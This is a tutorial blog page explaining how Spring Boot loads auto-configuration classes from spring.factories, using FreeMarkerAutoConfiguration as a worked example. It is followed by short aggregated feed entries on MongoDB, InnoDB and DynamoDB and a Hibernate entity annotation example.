The classes listed in spring.factories mainly tell Spring Boot which xxxAutoConfiguration classes this starter needs to load, i.e. the beans or features you actually want registered automatically. So: implement a class named in spring.factories, annotate it with @Configuration, and a starter is essentially defined.

If you want your starter to read configuration from the application that uses it, you only need to add the following annotation to the entry class:

@EnableConfigurationProperties(MyProperties.class)
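
Below is a minimal sketch (not from the original text) of what such a properties class could look like; MyProperties and the my.greeting key are hypothetical names used only for illustration:

import org.springframework.boot.context.properties.ConfigurationProperties;

// Binds entries such as my.greeting=hello from application.properties or application.yml.
@ConfigurationProperties(prefix = "my")
public class MyProperties {

    private String greeting = "hello"; // default used when the property is not set

    public String getGreeting() {
        return greeting;
    }

    public void setGreeting(String greeting) {
        this.greeting = greeting;
    }
}

With @EnableConfigurationProperties(MyProperties.class) on a configuration class, the bound bean can then be injected wherever it is needed.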

How the spring.factories file is read

This is implemented by org.springframework.core.io.support.SpringFactoriesLoader.

SpringFactoriesLoader works much like SPI (Service Provider Interface, described in some detail in the documentation of java.util.ServiceLoader). Java SPI provides a service-discovery mechanism: a way to locate service implementations for a given interface. It is somewhat similar to the idea of IoC, in that control over assembly is moved outside the program, which matters especially in modular designs [3]. (A small ServiceLoader sketch follows below.)
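
To make the analogy concrete, here is a minimal ServiceLoader sketch (not from the original text; GreetingService is a hypothetical interface). ServiceLoader reads provider class names from META-INF/services/<interface binary name>, much as SpringFactoriesLoader reads them from META-INF/spring.factories:

import java.util.ServiceLoader;

public class ServiceLoaderDemo {

    // The service contract; a provider jar implements it and lists the implementation's
    // fully qualified name in a META-INF/services file named after this interface.
    public interface GreetingService {
        String greet(String name);
    }

    public static void main(String[] args) {
        // Discovers every registered provider on the classpath (prints nothing if none exist).
        ServiceLoader<GreetingService> loader = ServiceLoader.load(GreetingService.class);
        for (GreetingService service : loader) {
            System.out.println(service.greet("world"));
        }
    }
}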

SpringFactoriesLoader loads the META-INF/spring.factories file from every JAR on the classpath.

The code that loads the spring.factories file lives in the loadFactoryNames method:

public static final String FACTORIES_RESOURCE_LOCATION = "META-INF/spring.factories";

....

public static List<String> loadFactoryNames(Class<?> factoryClass, ClassLoader classLoader) {
    String factoryClassName = factoryClass.getName();
    try {
        Enumeration<URL> urls = (classLoader != null ? classLoader.getResources(FACTORIES_RESOURCE_LOCATION) :
                ClassLoader.getSystemResources(FACTORIES_RESOURCE_LOCATION));
        List<String> result = new ArrayList<>();
        while (urls.hasMoreElements()) {
            URL url = urls.nextElement();
            Properties properties = PropertiesLoaderUtils.loadProperties(new UrlResource(url));
            String factoryClassNames = properties.getProperty(factoryClassName);
            result.addAll(Arrays.asList(StringUtils.commaDelimitedListToStringArray(factoryClassNames)));
        }
        return result;
    }
    catch (IOException ex) {
        throw new IllegalArgumentException("Unable to load [" + factoryClass.getName() +
                "] factories from location [" + FACTORIES_RESOURCE_LOCATION + "]", ex);
    }
}

The getCandidateConfigurations method of org.springframework.boot.autoconfigure.AutoConfigurationImportSelector then obtains the List<String> of candidate class names. Its code is as follows:

protected List<String> getCandidateConfigurations(AnnotationMetadata metadata,
        AnnotationAttributes attributes) {
    List<String> configurations = SpringFactoriesLoader.loadFactoryNames(
            getSpringFactoriesLoaderFactoryClass(), getBeanClassLoader());
    Assert.notEmpty(configurations,
            "No auto configuration classes found in META-INF/spring.factories. If you "
                    + "are using a custom packaging, make sure that file is correct.");
    return configurations;
}

Here, getSpringFactoriesLoaderFactoryClass() simply returns EnableAutoConfiguration.class; its code is:

protected Class<?> getSpringFactoriesLoaderFactoryClass() {
    return EnableAutoConfiguration.class;
}

So this piece of code inside getCandidateConfigurations:

List<String> configurations = SpringFactoriesLoader.loadFactoryNames(
        getSpringFactoriesLoaderFactoryClass(), getBeanClassLoader());

filters out the values whose key is the fully qualified name org.springframework.boot.autoconfigure.EnableAutoConfiguration. All the fully qualified names follow this naming scheme:

packageName.OuterClassName or packageName.OuterClassName$InnerClassName, e.g. org.springframework.boot.autoconfigure.context.PropertyPlaceholderAutoConfiguration

In Spring Boot's META-INF/spring.factories (full path: spring-boot/spring-boot-autoconfigure/src/main/resources/META-INF/spring.factories), the section of the configuration concerning EnableAutoConfiguration looks like this:

# Auto Configure org.springframework.boot.autoconfigure.EnableAutoConfiguration=\ org.springframework.boot.autoconfigure.admin.SpringApplicationAdminJmxAutoConfiguration,\ org.springframework.boot.autoconfigure.aop.AopAutoConfiguration,\ org.springframework.boot.autoconfigure.amqp.RabbitAutoConfiguration,\ org.springframework.boot.autoconfigure.batch.BatchAutoConfiguration,\ org.springframework.boot.autoconfigure.cache.CacheAutoConfiguration,\ org.springframework.boot.autoconfigure.cassandra.CassandraAutoConfiguration,\ org.springframework.boot.autoconfigure.cloud.CloudAutoConfiguration,\ org.springframework.boot.autoconfigure.context.ConfigurationPropertiesAutoConfiguration,\ org.springframework.boot.autoconfigure.context.MessageSourceAutoConfiguration,\ org.springframework.boot.autoconfigure.context.PropertyPlaceholderAutoConfiguration,\ org.springframework.boot.autoconfigure.couchbase.CouchbaseAutoConfiguration,\ org.springframework.boot.autoconfigure.dao.PersistenceExceptionTranslationAutoConfiguration,\ org.springframework.boot.autoconfigure.data.cassandra.CassandraDataAutoConfiguration,\ org.springframework.boot.autoconfigure.data.cassandra.CassandraRepositoriesAutoConfiguration,\ org.springframework.boot.autoconfigure.data.couchbase.CouchbaseDataAutoConfiguration,\ org.springframework.boot.autoconfigure.data.couchbase.CouchbaseRepositoriesAutoConfiguration,\ org.springframework.boot.autoconfigure.data.elasticsearch.ElasticsearchAutoConfiguration,\ org.springframework.boot.autoconfigure.data.elasticsearch.ElasticsearchDataAutoConfiguration,\ org.springframework.boot.autoconfigure.data.elasticsearch.ElasticsearchRepositoriesAutoConfiguration,\ org.springframework.boot.autoconfigure.data.jpa.JpaRepositoriesAutoConfiguration,\ org.springframework.boot.autoconfigure.data.ldap.LdapDataAutoConfiguration,\ org.springframework.boot.autoconfigure.data.ldap.LdapRepositoriesAutoConfiguration,\ org.springframework.boot.autoconfigure.data.mongo.MongoDataAutoConfiguration,\ org.springframework.boot.autoconfigure.data.mongo.MongoRepositoriesAutoConfiguration,\ org.springframework.boot.autoconfigure.data.mongo.ReactiveMongoDataAutoConfiguration,\ org.springframework.boot.autoconfigure.data.mongo.ReactiveMongoRepositoriesAutoConfiguration,\ org.springframework.boot.autoconfigure.data.neo4j.Neo4jDataAutoConfiguration,\ org.springframework.boot.autoconfigure.data.neo4j.Neo4jRepositoriesAutoConfiguration,\ org.springframework.boot.autoconfigure.data.solr.SolrRepositoriesAutoConfiguration,\ org.springframework.boot.autoconfigure.data.redis.RedisAutoConfiguration,\ org.springframework.boot.autoconfigure.data.redis.RedisRepositoriesAutoConfiguration,\ org.springframework.boot.autoconfigure.data.rest.RepositoryRestMvcAutoConfiguration,\ org.springframework.boot.autoconfigure.data.web.SpringDataWebAutoConfiguration,\ org.springframework.boot.autoconfigure.elasticsearch.jest.JestAutoConfiguration,\ org.springframework.boot.autoconfigure.flyway.FlywayAutoConfiguration,\ org.springframework.boot.autoconfigure.freemarker.FreeMarkerAutoConfiguration,\ org.springframework.boot.autoconfigure.gson.GsonAutoConfiguration,\ org.springframework.boot.autoconfigure.h2.H2ConsoleAutoConfiguration,\ org.springframework.boot.autoconfigure.hateoas.HypermediaAutoConfiguration,\ org.springframework.boot.autoconfigure.hazelcast.HazelcastAutoConfiguration,\ org.springframework.boot.autoconfigure.hazelcast.HazelcastJpaDependencyAutoConfiguration,\ org.springframework.boot.autoconfigure.http.HttpMessageConvertersAutoConfiguration,\ 
org.springframework.boot.autoconfigure.info.ProjectInfoAutoConfiguration,\ org.springframework.boot.autoconfigure.integration.IntegrationAutoConfiguration,\ org.springframework.boot.autoconfigure.jackson.JacksonAutoConfiguration,\ org.springframework.boot.autoconfigure.jdbc.DataSourceAutoConfiguration,\ org.springframework.boot.autoconfigure.jdbc.JdbcTemplateAutoConfiguration,\ org.springframework.boot.autoconfigure.jdbc.JndiDataSourceAutoConfiguration,\ org.springframework.boot.autoconfigure.jdbc.XADataSourceAutoConfiguration,\ org.springframework.boot.autoconfigure.jdbc.DataSourceTransactionManagerAutoConfiguration,\ org.springframework.boot.autoconfigure.jms.JmsAutoConfiguration,\ org.springframework.boot.autoconfigure.jmx.JmxAutoConfiguration,\ org.springframework.boot.autoconfigure.jms.JndiConnectionFactoryAutoConfiguration,\ org.springframework.boot.autoconfigure.jms.activemq.ActiveMQAutoConfiguration,\ org.springframework.boot.autoconfigure.jms.artemis.ArtemisAutoConfiguration,\ org.springframework.boot.autoconfigure.groovy.template.GroovyTemplateAutoConfiguration,\ org.springframework.boot.autoconfigure.jersey.JerseyAutoConfiguration,\ org.springframework.boot.autoconfigure.jooq.JooqAutoConfiguration,\ org.springframework.boot.autoconfigure.kafka.KafkaAutoConfiguration,\ org.springframework.boot.autoconfigure.ldap.embedded.EmbeddedLdapAutoConfiguration,\ org.springframework.boot.autoconfigure.ldap.LdapAutoConfiguration,\ org.springframework.boot.autoconfigure.liquibase.LiquibaseAutoConfiguration,\ org.springframework.boot.autoconfigure.mail.MailSenderAutoConfiguration,\ org.springframework.boot.autoconfigure.mail.MailSenderValidatorAutoConfiguration,\ org.springframework.boot.autoconfigure.mobile.DeviceResolverAutoConfiguration,\ org.springframework.boot.autoconfigure.mobile.DeviceDelegatingViewResolverAutoConfiguration,\ org.springframework.boot.autoconfigure.mobile.SitePreferenceAutoConfiguration,\ org.springframework.boot.autoconfigure.mongo.embedded.EmbeddedMongoAutoConfiguration,\ org.springframework.boot.autoconfigure.mongo.MongoAutoConfiguration,\ org.springframework.boot.autoconfigure.mongo.ReactiveMongoAutoConfiguration,\ org.springframework.boot.autoconfigure.mustache.MustacheAutoConfiguration,\ org.springframework.boot.autoconfigure.orm.jpa.HibernateJpaAutoConfiguration,\ org.springframework.boot.autoconfigure.reactor.core.ReactorCoreAutoConfiguration,\ org.springframework.boot.autoconfigure.security.SecurityAutoConfiguration,\ org.springframework.boot.autoconfigure.security.SecurityFilterAutoConfiguration,\ org.springframework.boot.autoconfigure.security.FallbackWebSecurityAutoConfiguration,\ org.springframework.boot.autoconfigure.security.oauth2.OAuth2AutoConfiguration,\ org.springframework.boot.autoconfigure.sendgrid.SendGridAutoConfiguration,\ org.springframework.boot.autoconfigure.session.SessionAutoConfiguration,\ org.springframework.boot.autoconfigure.social.SocialWebAutoConfiguration,\ org.springframework.boot.autoconfigure.social.FacebookAutoConfiguration,\ org.springframework.boot.autoconfigure.social.LinkedInAutoConfiguration,\ org.springframework.boot.autoconfigure.social.TwitterAutoConfiguration,\ org.springframework.boot.autoconfigure.solr.SolrAutoConfiguration,\ org.springframework.boot.autoconfigure.thymeleaf.ThymeleafAutoConfiguration,\ org.springframework.boot.autoconfigure.transaction.TransactionAutoConfiguration,\ org.springframework.boot.autoconfigure.transaction.jta.JtaAutoConfiguration,\ 
org.springframework.boot.autoconfigure.validation.ValidationAutoConfiguration,\ org.springframework.boot.autoconfigure.web.client.RestTemplateAutoConfiguration,\ org.springframework.boot.autoconfigure.web.reactive.HttpHandlerAutoConfiguration,\ org.springframework.boot.autoconfigure.web.reactive.ReactiveWebServerAutoConfiguration,\ org.springframework.boot.autoconfigure.web.reactive.WebFluxAnnotationAutoConfiguration,\ org.springframework.boot.autoconfigure.web.servlet.DispatcherServletAutoConfiguration,\ org.springframework.boot.autoconfigure.web.servlet.ServletWebServerFactoryAutoConfiguration,\ org.springframework.boot.autoconfigure.web.servlet.error.ErrorMvcAutoConfiguration,\ org.springframework.boot.autoconfigure.web.servlet.HttpEncodingAutoConfiguration,\ org.springframework.boot.autoconfigure.web.servlet.MultipartAutoConfiguration,\ org.springframework.boot.autoconfigure.web.servlet.WebMvcAutoConfiguration,\ org.springframework.boot.autoconfigure.websocket.WebSocketAutoConfiguration,\ org.springframework.boot.autoconfigure.websocket.WebSocketMessagingAutoConfiguration,\ org.springframework.boot.autoconfigure.webservices.WebServicesAutoConfiguration

Of course, not all of these AutoConfiguration classes are loaded; conditions such as @ConditionalOnClass on each AutoConfiguration are evaluated to decide whether it should be loaded. Below we use FreeMarkerAutoConfiguration as an example to walk through the whole auto-configuration process.

5.4 A worked example: FreeMarkerAutoConfiguration

We start with the spring-boot-starter-freemarker project, whose directory structure is:

.
├── pom.xml
├── spring-boot-starter-freemarker.iml
└── src
    └── main
        └── resources
            └── META-INF
                └── spring.provides

4 directories, 3 files

As you can see, this project contains no Java code at all, only two files: pom.xml and spring.provides. The starter itself is effectively empty as far as your application is concerned.

Here, the spring.provides file contains:

provides: freemarker,spring-context-support

and mainly serves to give the starter an easily distinguishable name.

Spring Boot manages a project's dependencies uniformly through starters. Starters use Maven's transitive dependency resolution to bundle commonly used libraries together into dependency starters tailored to a particular feature.

We can use IDEA's Maven dependency-diagram feature (shown below) to see which modules spring-boot-starter-freemarker depends on.


IDEA's Maven dependency diagram analysis

The modules that spring-boot-starter-freemarker depends on

From the dependency diagrams above, the relationships between them are easy to see.

Once the classes related to EnableAutoConfiguration have been processed in a Spring Boot application, Spring Boot goes on to resolve the configuration information of the corresponding classes. If we declare spring-boot-starter-freemarker, Maven automatically pulls in the spring-boot-autoconfigure project through the starter's transitive dependency on it.

Let's briefly look at the structure of the spring-boot-autoconfigure project.

The auto-configuration class for FreeMarker is org.springframework.boot.autoconfigure.freemarker.FreeMarkerAutoConfiguration.

Below is a brief analysis of the FreeMarkerAutoConfiguration class.

The FreeMarkerAutoConfiguration class carries four annotations:

@Configuration
@ConditionalOnClass({ freemarker.template.Configuration.class,
        FreeMarkerConfigurationFactory.class })
@AutoConfigureAfter(WebMvcAutoConfiguration.class)
@EnableConfigurationProperties(FreeMarkerProperties.class)
public class FreeMarkerAutoConfiguration {
    ...
}

Specifically,

(1) @Configuration is an annotation from the org.springframework.context.annotation package. Put simply, annotating a class with @Configuration is equivalent to configuring <beans> in XML, and annotating a method with @Bean is equivalent to configuring a <bean> in XML.

(2) @ConditionalOnClass, from the org.springframework.boot.autoconfigure.condition package, means that the annotated class is only registered as a bean when the specified classes are present on the classpath. In the code above, FreeMarkerAutoConfiguration is only instantiated as a bean when both freemarker.template.Configuration and FreeMarkerConfigurationFactory are on the classpath.

(3) @AutoConfigureAfter, from the org.springframework.boot.autoconfigure package. As the name suggests, FreeMarkerAutoConfiguration can only be instantiated after WebMvcAutoConfiguration has been processed (there is an ordering). Spring Boot uses the @AutoConfigureBefore and @AutoConfigureAfter annotations to define the load order of these configuration classes.

(4) @EnableConfigurationProperties enables support for the externalized configuration held in FreeMarkerProperties.class and automatically registers FreeMarkerProperties as a bean. The FreeMarkerProperties class holds the FreeMarker-related configuration properties:

@ConfigurationProperties(prefix = "spring.freemarker")
public class FreeMarkerProperties extends AbstractTemplateViewResolverProperties {

    public static final String DEFAULT_TEMPLATE_LOADER_PATH = "classpath:/templates/";

    public static final String DEFAULT_PREFIX = "";

    public static final String DEFAULT_SUFFIX = ".ftl";

    /**
     * Well-known FreeMarker keys which will be passed to FreeMarker's Configuration.
     */
    private Map<String, String> settings = new HashMap<>();

    /**
     * Comma-separated list of template paths.
     */
    private String[] templateLoaderPath = new String[] { DEFAULT_TEMPLATE_LOADER_PATH };

    /**
     * Prefer file system access for template loading. File system access enables hot
     * detection of template changes.
     */
    private boolean preferFileSystemAccess = true;

    public FreeMarkerProperties() {
        super(DEFAULT_PREFIX, DEFAULT_SUFFIX);
    }

    public Map<String, String> getSettings() {
        return this.settings;
    }

    public void setSettings(Map<String, String> settings) {
        this.settings = settings;
    }

    public String[] getTemplateLoaderPath() {
        return this.templateLoaderPath;
    }

    public boolean isPreferFileSystemAccess() {
        return this.preferFileSystemAccess;
    }

    public void setPreferFileSystemAccess(boolean preferFileSystemAccess) {
        this.preferFileSystemAccess = preferFileSystemAccess;
    }

    public void setTemplateLoaderPath(String... templateLoaderPaths) {
        this.templateLoaderPath = templateLoaderPaths;
    }

}

To sum up, only when conditions (1) and (2) are satisfied do steps (3) and (4) proceed, and the FreeMarkerAutoConfiguration bean is registered. The structure of the class is shown in the figure below:


Let's look at the code of its inner class FreeMarkerWebConfiguration:

@Configuration
@ConditionalOnClass(Servlet.class)
@ConditionalOnWebApplication(type = Type.SERVLET)
public static class FreeMarkerWebConfiguration extends FreeMarkerConfiguration {

    @Bean
    @ConditionalOnMissingBean(FreeMarkerConfig.class)
    public FreeMarkerConfigurer freeMarkerConfigurer() {
        FreeMarkerConfigurer configurer = new FreeMarkerConfigurer();
        applyProperties(configurer);
        return configurer;
    }

    @Bean
    public freemarker.template.Configuration freeMarkerConfiguration(
            FreeMarkerConfig configurer) {
        return configurer.getConfiguration();
    }

    @Bean
    @ConditionalOnMissingBean(name = "freeMarkerViewResolver")
    @ConditionalOnProperty(name = "spring.freemarker.enabled", matchIfMissing = true)
    public FreeMarkerViewResolver freeMarkerViewResolver() {
        FreeMarkerViewResolver resolver = new FreeMarkerViewResolver();
        this.properties.applyToViewResolver(resolver);
        return resolver;
    }

    @Bean
    @ConditionalOnMissingBean
    @ConditionalOnEnabledResourceChain
    public ResourceUrlEncodingFilter resourceUrlEncodingFilter() {
        return new ResourceUrlEncodingFilter();
    }

}

Here,

(1) @ConditionalOnWebApplication(type = Type.SERVLET) applies when the application is a servlet-based web application.

(2) @ConditionalOnMissingBean(name = "freeMarkerViewResolver") applies when no bean named freeMarkerViewResolver exists in the Spring container.

(3) @ConditionalOnProperty(name = "spring.freemarker.enabled", matchIfMissing = true) checks whether the spring.freemarker.enabled property is set; if it is missing (IfMissing), the condition is treated as true.

Only when conditions (1), (2) and (3) are all satisfied is the freeMarkerViewResolver bean registered. (A sketch of how a user-defined bean takes precedence follows below.)
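
As a hedged illustration (not from the original text), condition (2) is what lets an application supply its own resolver: if you define a bean with the same name, the auto-configured one backs off. CustomFreeMarkerConfig is a hypothetical class name:

import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
import org.springframework.web.servlet.view.freemarker.FreeMarkerViewResolver;

@Configuration
public class CustomFreeMarkerConfig {

    // A bean named "freeMarkerViewResolver" now exists in the container, so the
    // @ConditionalOnMissingBean guard in FreeMarkerWebConfiguration is not satisfied
    // and Spring Boot does not register its own resolver.
    @Bean
    public FreeMarkerViewResolver freeMarkerViewResolver() {
        FreeMarkerViewResolver resolver = new FreeMarkerViewResolver();
        resolver.setCache(false);   // example customization
        resolver.setSuffix(".ftl");
        return resolver;
    }
}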

We can also define our own my-starter and implement a corresponding @MyEnableAutoConfiguration. Spring Boot has many third-party starters, and their auto-configuration works essentially the same way; for example, MybatisAutoConfiguration in mybatis-spring-boot-starter, whose source you can read at https://github.com/mybatis/spring-boot-starter [4]. (A minimal sketch of a custom auto-configuration follows below.)
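
A rough sketch (not from the original text) of what a hypothetical my-starter's auto-configuration could look like, reusing the hypothetical MyProperties class from the earlier sketch; MyClient and MyAutoConfiguration are made-up names:

import org.springframework.boot.autoconfigure.condition.ConditionalOnClass;
import org.springframework.boot.autoconfigure.condition.ConditionalOnMissingBean;
import org.springframework.boot.context.properties.EnableConfigurationProperties;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;

// MyClient.java - the (hypothetical) library class the starter configures.
class MyClient {
    private final String greeting;
    MyClient(String greeting) { this.greeting = greeting; }
    String greet(String name) { return greeting + ", " + name; }
}

// MyAutoConfiguration.java - would be registered in META-INF/spring.factories under the
// org.springframework.boot.autoconfigure.EnableAutoConfiguration key.
@Configuration
@ConditionalOnClass(MyClient.class)                 // only when the library is on the classpath
@EnableConfigurationProperties(MyProperties.class)  // bind the my.* properties
public class MyAutoConfiguration {

    @Bean
    @ConditionalOnMissingBean // back off if the application defines its own MyClient
    public MyClient myClient(MyProperties properties) {
        return new MyClient(properties.getGreeting());
    }
}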

After all that prose, here is one vivid picture to sum it up [5]:


How Spring Boot autoconfigure works (diagram)

5.5 spring.factories and customizing application initialization behavior

Everything so far has been about reading, from the properties file, the values keyed by the fully qualified name org.springframework.boot.autoconfigure.EnableAutoConfiguration. Internally, Spring Boot uses many other keys as well to filter out the classes it needs to load:

# Initializers
org.springframework.context.ApplicationContextInitializer=\
org.springframework.boot.autoconfigure.SharedMetadataReaderFactoryContextInitializer,\
org.springframework.boot.autoconfigure.logging.AutoConfigurationReportLoggingInitializer

# Application Listeners
org.springframework.context.ApplicationListener=\
org.springframework.boot.autoconfigure.BackgroundPreinitializer

# Auto Configuration Import Listeners
org.springframework.boot.autoconfigure.AutoConfigurationImportListener=\
org.springframework.boot.autoconfigure.condition.ConditionEvaluationReportAutoConfigurationImportListener

# Auto Configuration Import Filters
org.springframework.boot.autoconfigure.AutoConfigurationImportFilter=\
org.springframework.boot.autoconfigure.condition.OnClassCondition

# Failure analyzers
org.springframework.boot.diagnostics.FailureAnalyzer=\
org.springframework.boot.autoconfigure.diagnostics.analyzer.NoSuchBeanDefinitionFailureAnalyzer,\
org.springframework.boot.autoconfigure.jdbc.DataSourceBeanCreationFailureAnalyzer,\
org.springframework.boot.autoconfigure.jdbc.HikariDriverConfigurationFailureAnalyzer

# Template availability providers
org.springframework.boot.autoconfigure.template.TemplateAvailabilityProvider=\
org.springframework.boot.autoconfigure.freemarker.FreeMarkerTemplateAvailabilityProvider,\
org.springframework.boot.autoconfigure.mustache.MustacheTemplateAvailabilityProvider,\
org.springframework.boot.autoconfigure.groovy.template.GroovyTemplateAvailabilityProvider,\
org.springframework.boot.autoconfigure.thymeleaf.ThymeleafTemplateAvailabilityProvider,\
org.springframework.boot.autoconfigure.web.servlet.JspTemplateAvailabilityProvider

These keys are likewise defined in the spring-boot/spring-boot-autoconfigure/src/main/resources/META-INF/spring.factories file.

There is also corresponding auto-configuration for tests, defined in the
spring-boot/spring-boot-test-autoconfigure/src/main/resources/META-INF/spring.factories file.

In addition, spring.factories can be used to customize the application's initialization behavior, which lets us manipulate Spring's application context (ApplicationContext) before the application is loaded.

For example, we can use the addApplicationListener() method of ConfigurableApplicationContext to register listeners in the ApplicationContext. (A minimal initializer sketch follows below.)
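
A minimal sketch (not from the original text) of such an initializer; MyContextInitializer is a hypothetical class that would be registered in spring.factories under the org.springframework.context.ApplicationContextInitializer key:

import org.springframework.context.ApplicationContextInitializer;
import org.springframework.context.ApplicationEvent;
import org.springframework.context.ApplicationListener;
import org.springframework.context.ConfigurableApplicationContext;

public class MyContextInitializer
        implements ApplicationContextInitializer<ConfigurableApplicationContext> {

    @Override
    public void initialize(ConfigurableApplicationContext applicationContext) {
        // Runs before the context is refreshed, so the listener sees all later events.
        ApplicationListener<ApplicationEvent> listener = event ->
                System.out.println("application event: " + event.getClass().getSimpleName());
        applicationContext.addApplicationListener(listener);
    }
}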

This is exactly how the auto-configuration report logging feature is implemented. Look at the Initializers section of spring.factories:

# Initializers
org.springframework.context.ApplicationContextInitializer=\
org.springframework.boot.autoconfigure.SharedMetadataReaderFactoryContextInitializer,\
org.springframework.boot.autoconfigure.logging.AutoConfigurationReportLoggingInitializer

When AutoConfigurationReportLoggingInitializer observes system events such as a context refresh (ContextRefreshedEvent) or an application startup failure (ApplicationFailedEvent), Spring Boot can react to them. The relevant code lives in AutoConfigurationReportLoggingInitializer.AutoConfigurationReportListener; the supported event types (supportsEventType) are shown here:

private class AutoConfigurationReportListener implements GenericApplicationListener {

    ...

    @Override
    public boolean supportsEventType(ResolvableType resolvableType) {
        Class<?> type = resolvableType.getRawClass();
        if (type == null) {
            return false;
        }
        return ContextRefreshedEvent.class.isAssignableFrom(type)
                || ApplicationFailedEvent.class.isAssignableFrom(type);
    }

    @Override
    public boolean supportsSourceType(Class<?> sourceType) {
        return true;
    }

    @Override
    public void onApplicationEvent(ApplicationEvent event) {
        AutoConfigurationReportLoggingInitializer.this.onApplicationEvent(event);
    }

}

To start the application in debug mode, use the -Ddebug flag or add debug=true to application.properties. When the application is started in debug mode, Spring Boot produces an auto-configuration report for us. For each auto-configuration, the report shows why it was applied or why it failed. The report looks roughly like this:

========================= AUTO-CONFIGURATION REPORT =========================

Positive matches:
-----------------

   DataSourceAutoConfiguration matched:
      - @ConditionalOnClass found required classes 'javax.sql.DataSource', 'org.springframework.jdbc.datasource.embedded.EmbeddedDatabaseType'; @ConditionalOnMissingClass did not find unwanted class (OnClassCondition)

   DataSourceAutoConfiguration#dataSourceInitializer matched:
      - @ConditionalOnMissingBean (types: org.springframework.boot.autoconfigure.jdbc.DataSourceInitializer; SearchStrategy: all) did not find any beans (OnBeanCondition)

   DataSourceAutoConfiguration.PooledDataSourceConfiguration matched:
      - AnyNestedCondition 2 matched 0 did not; NestedCondition on DataSourceAutoConfiguration.PooledDataSourceCondition.PooledDataSourceAvailable PooledDataSource found supported DataSource; NestedCondition on DataSourceAutoConfiguration.PooledDataSourceCondition.ExplicitType @ConditionalOnProperty (spring.datasource.type) matched (DataSourceAutoConfiguration.PooledDataSourceCondition)
      - @ConditionalOnMissingBean (types: javax.sql.DataSource,javax.sql.XADataSource; SearchStrategy: all) did not find any beans (OnBeanCondition)

   ...

Exclusions:
-----------

    None

Unconditional classes:
----------------------

    org.springframework.boot.autoconfigure.web.WebClientAutoConfiguration
    org.springframework.boot.autoconfigure.context.PropertyPlaceholderAutoConfiguration
    org.springframework.boot.autoconfigure.context.ConfigurationPropertiesAutoConfiguration
    org.springframework.boot.autoconfigure.info.ProjectInfoAutoConfiguration

Besides the starters provided by the Spring Boot team, there are many commonly used third-party starters contributed by the community; see [2] for a list.

In addition, many companies in China use the RPC framework Dubbo; for Spring Boot integration with Dubbo, see: https://github.com/linux-china/spring-boot-dubbo.

References:

1. http://docs.spring.io/spring-boot/docs/current/reference/htmlsingle/#using-boot-starter
2. https://github.com/spring-projects/spring-boot/tree/master/spring-boot-starters
3. http://www.cnblogs.com/javaee6/p/3714719.html
4. https://github.com/mybatis/spring-boot-starter
5. https://afoo.me/posts/2015-07-09-how-spring-boot-works.html



Author: 华夏商周秦汉唐宋元明清中华民国
Link: http://www.jianshu.com/p/ccadc2bdb6d7
Source: Jianshu (简书)
Copyright belongs to the author. For commercial reproduction, please contact the author for authorization; for non-commercial reproduction, please credit the source.


小马歌 2017-08-02 16:35

          Let’s do this the hard way        
Recent discoveries of security vulnerabilities in Rails and MongoDB led me to thinking about how people get to write software. In engineering, you don’t get to build a structure people can walk into without years of study. In software, we …
          Re: How important is it to use 2-byte and 3-byte integers?        

Some additional discussion here:
https://github.com/github/g...

For some semi-proof that the InnoDB buffer pool is not variable-length in memory, you can look at the PFS memory instrumentation in 5.7. The buffer pool is all one allocation, just larger than innodb_buffer_pool_size.


          JUGademy#5        
#1. Introduction to MongoDB / Justyna Walkowska. Abstract: MongoDB is a popular non-relational database based on documents in JSON format. In the presentation I will try to cover the following topics: – MongoDB compared to other databases – Installing MongoDB – The data format – Interacting directly with the database – Communicating with the database from code written in … Continue reading JUGademy#5
          Comment on linux script to check if a service is running and start it, if it’s stopped by venu        
Hi everyone, I want to monitor the apache2, mysql, nodejs and mongodb services with a shell script. Please give me the script for this.. thank you
          Comment on How to get the MongoDB server version using PyMongo by Ross Farinella        
Updated code to include the slicker-looking "server_info()" call -- thanks Mike!
          Comment on How to get the MongoDB server version using PyMongo by Mike Dirolf        
Good tip! You can also use the server_info() method on a Connection instead of running the command manually. There are some tools (meant just for testing, but might be worth a look) that do this in the `test/version.py` file in the PyMongo source tree.
          Converting MyISAM to InnoDB and a lesson on variance        
I'm about to start working through converting a large MySQL installation to InnoDB. For the particular use case durability is desired, and with MyISAM a loss of power almost certainly guarantees data loss. Durability is not available as an option. So the normal question people ask is.. okay, what do I pay for this feature? … Continue reading Converting MyISAM to InnoDB and a lesson on variance
          Changing default users collection name for accounts package in Meteor        
We ran into a peculiar issue while working with Meteor at Gummicube. We had two separate Meteor application that both needed to access the same MongoDB since they shared many of the same collections, but they needed to have their own users collections. This was a problem, since the users collection always had the default […]
          Postmortem: Migrating MongoDB to DynamoDB        
Introduction DynamoDB, a relatively new arrival to the NoSQL party, celebrated its three-year anniversary earlier this year. We have now seen it deployed in mature products like the portfolio of online games at TinyCo and our own app store optimization solution at Gummicube. It’s pay-as-you-go, it’s extremely scalable, with basically zero administration overhead. However, it […]
          Couchbase vs. DynamoDB for Free-To-Play Games        
Perry and I used to joke about what will get released first: FableLab’s next game or Couchbase 2.0.  And yes, he won 🙂  But that does mean that I get the option to use the new version to power my next game.  Besides key operational improvement, 2.0 also added several key features that were missing […]
          How to connect MongoDB using PHP        
After posting content about MongoDB, I'm following up with another post about MongoDB, but this time with PHP. Yes, this post is about connecting MongoDB with PHP. If you are using Windows, you can check the links below about installing MongoDB and enabling the extension in Wamp Server. Installing MongoDB in Windows OS How to enable MongoDB extension in WampServer […]
          How to enable MongoDB extension in WampServer        
This post will teach you how to enable the MongoDB extension in WampServer for PHP version 5.5.12. If you have not installed MongoDB on your system, you can check the post Installing MongoDB in Windows OS. Things that need to be installed before enabling MongoDB in WampServer: WampServer 2.5 and MongoDB 3.0. If everything is installed, then we […]
          Installing MongoDB in Windows OS        
MongoDB is a cross-platform document-oriented database that stores data as JSON-like key-value structures, which makes data integration easy. Here we are going to look at installing MongoDB on Windows. MongoDB supports four operating systems: Windows, Linux, Mac OS X and Solaris. You can also download the current, previous and development releases. https://www.mongodb.org/downloads We are […]
          Hibernate annotations (part 2: creating tables)        

To trace the SQL Hibernate generates, add: <property name="hibernate.show_sql">true</property>

Create a new User class:

 

@Entity
@Table(name = "E_USER", uniqueConstraints = {
        @UniqueConstraint(columnNames = { "yahoo" })
})
public class User {

    private int id;
    private String yahoo; // the nickname must be unique

    @Id
    @GeneratedValue(strategy = GenerationType.AUTO)
    public int getId() {
        return id;
    }
    public void setId(int id) {
        this.id = id;
    }
    public String getYahoo() {
        return yahoo;
    }
    public void setYahoo(String yahoo) {
        this.yahoo = yahoo;
    }

}

